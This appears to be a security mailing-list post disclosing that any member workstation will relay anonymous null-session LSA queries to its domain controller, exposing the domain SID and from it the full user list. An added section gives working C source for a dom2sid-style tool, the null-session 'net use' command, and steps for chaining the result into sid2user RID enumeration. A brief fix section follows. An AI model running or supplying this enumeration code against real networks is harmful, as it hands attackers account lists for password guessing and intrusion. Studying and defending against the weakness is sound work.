This may not be new but I haven't seen it anywhere else so
here it is.
- Description -
It is possible to enumerate the entire user list of a domain by
querying any workstation that is a member of that domain. Even if
the domain controller is hidden behind a firewall or has IP
filtering enabled, the list still comes out, because the
workstation forwards the query to the DC for you.
I suspect that this may even work on a workstation
connected to its DC through a VPN, but I haven't tested it
yet.
- Explanations -
The idea is to get the workstation to return its domain SID
through the LsaQueryInformationPolicy() function (the policy
handle that call needs is opened with LsaOpenPolicy(), which is
where the access mask is requested). Normally that function
would require the "GENERIC_READ | GENERIC_EXECUTE" access rights
in order to work, but I discovered that by simply requesting the
"MAXIMUM_ALLOWED" access right instead, it works through the good
old null session.
- Exploitation -
I wrote a small program called "dom2sid" demonstrating
this. It should be available shortly on the securityfocus
free tools list. It returns the computer/domain names and
SIDs. You can then feed the domain SID to the popular sid2user
tool and get the whole user list. If the computer SID and the
domain SID are equal, you have found a DC.
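The query and the follow-on checks described above, written out as an added example. This is not the author's dom2sid tool (its source is not on this page); it assumes a Windows build with advapi32 (MinGW: gcc dom2sid_example.c -o dom2sid_example -ladvapi32) and a target passed as \\HOST, with a null session set up beforehand by "net use \\HOST\ipc$ "" /user:""". The helper names and the sample SID bytes in the comments are the example's own. The LSA call is Windows-only; the SID-to-string conversion, the DC check and the RID helper are plain C so they build anywhere.

```c
/* dom2sid-style example (not the original tool): open the remote LSA policy
 * with MAXIMUM_ALLOWED, read the account-domain and primary-domain SIDs,
 * compare them (equal => DC) and emit a SID+RID for sid2user-style lookups. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

/* Binary SID layout: revision (1), sub-authority count, 48-bit big-endian
 * identifier authority, then count little-endian 32-bit sub-authorities.
 * Writes "S-1-5-21-..." into out; returns 0 on success, -1 if malformed. */
int sid_to_string(const uint8_t *sid, size_t len, char *out, size_t outlen)
{
    if (len < 8 || sid[0] != 1 || sid[1] > 15 || len < 8 + 4u * sid[1])
        return -1;
    uint64_t auth = 0;
    for (int i = 0; i < 6; i++)
        auth = (auth << 8) | sid[2 + i];
    /* Authorities that do not fit in 32 bits are printed in hex, as Windows does. */
    int n = (auth >> 32) ? snprintf(out, outlen, "S-1-0x%012llX", (unsigned long long)auth)
                         : snprintf(out, outlen, "S-1-%llu", (unsigned long long)auth);
    if (n < 0 || (size_t)n >= outlen) return -1;
    for (int i = 0; i < sid[1]; i++) {
        const uint8_t *p = sid + 8 + 4 * i;
        uint32_t sub = (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
                       ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
        int m = snprintf(out + n, outlen - (size_t)n, "-%lu", (unsigned long)sub);
        if (m < 0 || (size_t)m >= outlen - (size_t)n) return -1;
        n += m;
    }
    return 0;
}

/* A DC's own account domain is the domain itself, so both SIDs match there;
 * a member workstation reports its local machine SID and a different domain SID. */
int is_domain_controller(const char *computer_sid, const char *domain_sid)
{
    return strcmp(computer_sid, domain_sid) == 0;
}

/* The SID that sid2user resolves: domain SID plus a RID (500 = Administrator). */
int sid_with_rid(const char *domain_sid, uint32_t rid, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "%s-%lu", domain_sid, (unsigned long)rid);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

#ifdef _WIN32
#include <windows.h>
#include <ntsecapi.h>
#include <wchar.h>

/* LSA_UNICODE_STRING is not NUL-terminated; copy it out before printing. */
static void copy_name(const LSA_UNICODE_STRING *s, wchar_t *dst, size_t n)
{
    size_t chars = s->Length / sizeof(WCHAR);
    if (chars >= n) chars = n - 1;
    memcpy(dst, s->Buffer, chars * sizeof(WCHAR));
    dst[chars] = 0;
}

/* Query \\host's LSA policy; fills both SID strings. Returns 0 on success. */
static int query_domain_sids(const wchar_t *host, char *computer_sid, char *domain_sid, size_t outlen)
{
    LSA_OBJECT_ATTRIBUTES oa;
    LSA_UNICODE_STRING server;
    LSA_HANDLE policy;
    PPOLICY_ACCOUNT_DOMAIN_INFO acct = NULL;
    PPOLICY_PRIMARY_DOMAIN_INFO prim = NULL;
    wchar_t cname[256], dname[256];
    int rc = -1;

    ZeroMemory(&oa, sizeof oa);
    server.Buffer = (PWSTR)host;
    server.Length = (USHORT)(wcslen(host) * sizeof(WCHAR));
    server.MaximumLength = (USHORT)(server.Length + sizeof(WCHAR));
    /* MAXIMUM_ALLOWED instead of GENERIC_READ | GENERIC_EXECUTE: the server hands
     * back whatever the anonymous caller is permitted rather than denying the open. */
    if (LsaOpenPolicy(&server, &oa, MAXIMUM_ALLOWED, &policy) != 0)
        return -1;
    if (LsaQueryInformationPolicy(policy, PolicyAccountDomainInformation, (PVOID *)&acct) == 0 &&
        LsaQueryInformationPolicy(policy, PolicyPrimaryDomainInformation, (PVOID *)&prim) == 0 &&
        prim->Sid != NULL && /* NULL when the host is in a workgroup, not a domain */
        sid_to_string(acct->DomainSid, GetLengthSid(acct->DomainSid), computer_sid, outlen) == 0 &&
        sid_to_string(prim->Sid, GetLengthSid(prim->Sid), domain_sid, outlen) == 0) {
        copy_name(&acct->DomainName, cname, 256);
        copy_name(&prim->Name, dname, 256);
        printf("computer name %ls\ndomain name   %ls\n", cname, dname);
        rc = 0;
    }
    if (acct) LsaFreeMemory(acct);
    if (prim) LsaFreeMemory(prim);
    LsaClose(policy);
    return rc;
}
#endif

int main(int argc, char **argv)
{
#ifdef _WIN32
    wchar_t host[256];
    char computer[128], domain[128], user[160];
    if (argc != 2) { fprintf(stderr, "usage: %s \\\\HOST\n", argv[0]); return 2; }
    mbstowcs(host, argv[1], 255); host[255] = 0;
    if (query_domain_sids(host, computer, domain, sizeof computer) != 0) {
        fprintf(stderr, "LSA query failed (no null session, or access denied)\n");
        return 1;
    }
    printf("computer SID  %s\ndomain SID    %s\n%s\n", computer, domain,
           is_domain_controller(computer, domain) ? "this host is a DC" : "member workstation");
    sid_with_rid(domain, 500, user, sizeof user);
    printf("first SID to feed sid2user: %s\n", user);
    return 0;
#else
    (void)argc; (void)argv;
    fputs("the LSA query needs Windows; only the SID helpers build here\n", stderr);
    return 2;
#endif
}
```

Once the domain SID is known, the rest is the sid2user loop the post describes: append RIDs starting at 500 and resolve each one; the workstation relays the lookups to the DC the same way it relayed the policy query.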
- Fix -
The "restrict anonymous" solution provided by Microsoft
doesn't help here. The only way I was able to stop this
behavior was to use a program called fixpol.exe. Don't ask
me where I found that one, I don't remember...
Enjoy !!
If this is old stuff, well just forget about this message !!